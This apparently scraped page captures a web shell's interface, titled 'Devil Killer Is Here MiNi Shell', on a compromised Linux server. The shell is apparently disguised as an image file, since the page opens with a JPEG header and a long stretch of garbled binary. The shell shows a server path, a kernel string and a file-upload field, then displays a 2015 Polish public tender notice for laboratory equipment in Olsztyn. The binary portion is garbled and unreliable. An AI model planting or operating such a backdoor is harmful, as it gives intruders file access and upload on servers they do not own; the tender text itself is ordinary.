JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150723/109559-N-2015.html

<p class="kh_header"><b>Olsztyn: Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.) na dostawę sprzętu laboratoryjnego_powtórka dla potrzeb Wojewódzkiej Stacji Sanitarno-Epidemiologicznej w Olsztynie.</b><br>
<b>Numer ogłoszenia: 109559 - 2015; data zamieszczenia: 23.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna , ul. Żołnierska 16/201, 10-561 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5279500, faks 089 5279788.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsse.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.) na dostawę sprzętu laboratoryjnego_powtórka dla potrzeb Wojewódzkiej Stacji Sanitarno-Epidemiologicznej w Olsztynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - LBŚiŻ - Spektrofotometr
Zadanie 2 - LBŚiŻ - Termohigrobarometr
Zadanie 3 - Laboratorium w Elblągu - Waga analityczna 
Zadanie 4 - LBEK - Pipeta automatyczna - 2 sztuki 
Zadanie 5 - LBŚiŻ - Termometr elektroniczny - 2 sztuki
Zadanie 6 - LBŚiŻ - Rejestrator temperatury - 2 sztuki.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.40.00.00-9, 38.31.00.00-1, 38.43.70.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia. Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aby spełnić warunek posiadania wiedzy i doświadczenia Wykonawca musi wykazać wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej jednej dostawy polegającej na dostawie urządzenia o wartości równej lub większej odpowiednio dla każdego zadania: Zad 1 - wartość równa lub większa od 17 000 zł, Zad 2 - wartość równa lub większa od 1 900 zł, Zad 3 - wartość równa lub większa od 12 500 zł, Zad 4 - wartość równa lub większa od 2 900 zł, Zad 5 - wartość równa lub większa od 2 000 zł, Zad 6 - wartość równa lub większa od 1 800 zł oraz załączyć dokument potwierdzający, że dostawa ta została wykonana należycie. 
Załączony wykaz powinien potwierdzać wykonaną dostawę w PLN. W przypadku Wykonawców, którzy realizowali usługi/zamówienia za wynagrodzeniem wyrażonym w innych walutach niż złoty polski, Zamawiający przeliczy wartość tych usług/zamówień po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia. Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia. Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia. Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia. Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie: spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">instrukcje obsługi, kopię aktualnego certyfikatu jakości 9001 oraz ISO 13485 producenta, z zakresem certyfikacji obejmującym omawiany produkt oraz  kopię certyfikatu CE IVD sprzętu</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin dostawy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsse.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Sanitarno - Epidemiologiczna w Olsztynie 
10-561 Olsztyn, ul. Żołnierska 16, pokój nr 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 10:00, miejsce: Wojewódzka Stacja Sanitarno - Epidemiologiczna w Olsztynie 
10-561 Olsztyn, ul. Żołnierska 16, pokój nr 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Spektrofotometr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie fabrycznie nowe, nieużywane
urządzenie aktualnie produkowane na rynku
możliwość wykonywania spektrofotometrycznych oznaczeń manganu, żelaza, jonu amonowego, azotynów, azotanów, siarczanów, fosforanów, fluorków, boru, glinu, chloru według procedur pomiarowych stosowanych w laboratorium
możliwość wykonania wielopunktowej kalibracji (min.5 punktów) w kilku powtórzeniach dla każdego punktu kalibracyjnego; możliwość edycji i przeglądania wyników pomiarów kalibracyjnych pozwalających na korektę rezultatów (powtarzanie wyników cząstkowych bez konieczności powtarzania całej kalibracji) 
możliwość odczytu krzywych kalibracji, współczynników korelacji, współczynników równania itp.
możliwość programowania i przechowywania w pamięci aparatu metod (procedur) pomiarowych stosowanych w laboratorium (min. 50)
możliwość przeglądania i przechowywania wyników pomiarowych w pamięci aparatu (min. 1000 wyników)
możliwość wyboru jednostki pomiaru (mg/l, mikro.g/l) oraz określenie ilości miejsc znaczących (min. 3 miejsca po przecinku)
gniazdo pomiarowe umożliwiające stosowanie kuwet prostokątnych 10mm i 50mm
prezentacja aparatu w siedzibie zamawiającego przed złożeniem oferty, w celu sprawdzenia  czy sprzęt spełnia oczekiwania laboratorium (wykonanie przykładowej krzywej kalibracyjnej wg metodyki stosowanej w laboratorium i wykonanie analizy próbki rzeczywistej)
zakres dłogości fal - co najmniej 325-1100 nm
powtarzalność dłogości fal - co najmniej ?0,1 nm
dokładność długości fal nie gorsza niż ? 1,5 nm
dokładność absorbancji nie gorsza niż ? 0,005 Abs
liniowy zakres pomiaru fotometrycznego - co najmniej do 3,0 Abs
możliwość tranferu danych (złącza USB)
czytelny, łatwy w obsłudze wyświetlacz
komplet kuwet do spektrofotometru, po 2 szt. (10 mm i 50 mm).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termohigrobarometr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie fabrycznie nowe, nieużywane
urządzenie aktualnie produkowane na rynku
wbudowana sonda pomiarowa
wyświetlacz LCD
wbudowane po dwa alarmy na każdy mierzony parametr
posiadający pamięć wartości MIN/MAX
zakres pomiarowy wilgotności (0 do 100) % RH
zakres pomiarowy temeratury (czujnik wewnętrzny) min (-10 do +50) stC
zakres pomiarowy ciśnienia barometrycznego min (900 do 1100) hPa
zakres pomiarowy temp. punktu rosy min (-50 do +80) stC (wartość wyliczenia)
rozdzielczość 0,1%; 0,1stC
dokładność pomiaru temperatury max ? 0,4stC
dokładność pomiaru wilgotności max ? 2,5% ( w zakresie 5 do 95 % RH)
dokładność pomiaru ciśnienia barometrycznego max ? 1 hPa ( w 23stC)
dokładność wskazań temp. punktu rosy max ? 0,5stC ( w zakresie 30 do 95% RH)
warunki pracy i przechowywania min (-10 do 50) stC, min (5 do 95) % RH
zasilanie baterie i akumulatorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Waga analityczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie fabrycznie nowe, nieużywane, urządzenie aktualnie produkowane na rynku,
klasa I, maksymalne obciążenie 220g, zakres ważenia 100-220g,
dokładność odczytu 0,01 mg dla zakresu ważenia do 100 g - 0,1 mg dla zakresu ważenia do 220g, działka legalizacyjna e równa się 1 mg czas pomiaru mniejsze lub równe 6-3 s średnica szalki 80 mm adiustacja automatyczna iso CAL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.31.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pipeta automatyczna - 2 sztuki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie fabrycznie nowe, nieużywane
urządzenie aktualnie produkowane na rynku
pipeta nastawna o zmiennej pojemności 100 mikrol - 1000 mikrol
krok nastawny - 1 mikrol
czteropozycyjny, precyzyjny wskaźnik nastawionej pojemności
blokada zapobiegająca przypadkowemu przestawieniu pojemności
możliwość sterylizacji całej pipety w autoklawie w temperaturze 121°C bez konieczności podejmowania dodatkowych zabiegów np.. rozkręcanie, mechaniczne rozszczelnianie, regulacja po procesie sterylizacji etc.
konstrukcja pipety powinna umożliwiać obsługę sprzętu jedną ręką
konstrukcja pipety powinna umożliwiać pracę w pełnym zakresie osobom prawo i leworęcznym
system zrzucania końcówek połączony w jednym przycisku z dozownikiem
dołączony do dostawy indywidualny protokół kalibracji pipety z numerem seryjnym, numer seryjny powinien być trwale naniesiony na pipetę w widocznym miejscu
pipeta powinna posiadać możliwość rekalibracji
wymagane parametry oferowanego sprzętu dla pojemności nominalnej (maksmalnej): błąd dokładności pipetowania (błąd systematyczny, niedokładność) nie większy niż 0,6% oraz błąd powtarzalności (błąd przypadkowy, nieprecyzyjny) nie większy niż 0,2%
oferowany sprzęt powinien posiadać certyfikat CE IVD
pipeta powinna umożliwiać stabilne zamocowanie (zawieszenie) na statywie karuzelowym typu 3115 firmy Eppendorf. Jeśli pipeta ma konstrukcję uniemożliwiającą dopasowanie jej do tego typu statywu, do oferowanego sprzętu należy dołączyć uchwyt dopasowany do pipety, który można zamontować na statywie typu 3115 tak, aby użytkownik miał możliwość jednoczesnego stosowania statywu karuzelowego do zamawianej pipety oraz pipet Eppendoprf (Eppendorf Variable Reference). Mocowanie uchwytu i pipet na statywie karuzelowym powinno gwarantować możliwość swobodnego przenoszenia statywu wra z pipetami, bez ryzyka wypadnięcia pipety ze statywu.
pipeta kompatybilna z końcówkami 50 mikrol - 1000 mikrol firmy Eppendorf - konstrukcja powinna umożliwiać prawidłową pracę z wymienionymi końcówkami
w połączeniu z końcówkami 50 mikrol - 1000 mikrol firmy Eppendorf pipeta powinna wykazywać następujące parametry dla pojemności nominalnej (maksymalnej): błąd dokładności pipetowania (błąd systematyczny, niedokładność) nie większy niż 0,6%  oraz błąd powtarzalności (błąd przypadkowy, nieprecyzyjność) nie większy niż 0,3% 
pipetę należy dostarczyć wraz ze świadectwem wzorcowania wykonanego przez laboratorium wzorcujące objęte akredytacją Polskiego Centrum Akredytacji w oparciu o normę PN-EN ISO/IEC 17025 lub przez nadrzędną instytucję metrologiczną (wzorcowanie trzypunktowe, obejmujące pojemność minimalną, maksymalną i 50 % pojemnośc)
wraz z pipetą należy dostarczyć autoklawowalne pudełko wielokrotnego użytku, zawierające komplet co najmniej 96 koncówek o pojemności 1000 mikrol, pasujących do pipety.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Termometr elektroniczny - 2 sztuki ze świadectwem wzorcowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie fabrycznie nowe, nieużywane
urządzenie aktualnie produkowane na rynku
termometr elektroniczny z sondą
Urządzenie mierzące temperaturę w zakresie od -50oC do 200oC
Wykonany w specjalnej obudowie przemysłowej z tworzywa ABS z uszczelnieniem, odporny na kurz, brud i wodę
Sonda wykonana ze stali kwasoodpornej
Sonda zaopatrzona w przewód przyłączeniowy o długości 1 m, w którą wbudowany jest krzemowy czujnik temperatury
Przewód sondy charakteryzujący się dużą odpornością mechaniczną i temperaturową (od -50oC do 200oC).
4 elementowy wyświetlacz ciekłokrystaliczny 
Termometr zasilany z dwóch baterii litowych 2xAA 1,5V
Automatyczna kontrola stanu baterii z komunikatem na wyświetlaczu LCD 3 ? cyfry
Rozdzielczość 0,1oC
Dokładność ?0,1oC
Wymiary obudowy 150x82x29mm 
Wymiary sondy: min. 1000mm
Termometr posiadający przyciski: ON/OFF, HOLD, ERASE, MAX, MIN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Rejestrator temperatury - 2 sztuki ze świadectwem wzorcowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie fabrycznie nowe, nieużywane
urządzenie aktualnie produkowane na rynku
Przenośny rejestrator temperatury z wbudowanym wyświetlaczem oraz z łączem USB
Wodoszczelny (IP68)
Bezpłatne oprogramowanie
Własne zasilanie bateryjne (bateria 1xCR2032)
Zakres pomiarowy od -25oC do 80oC
Dokładność ?0,3oC
Pamięć min. 1000 zapisów 
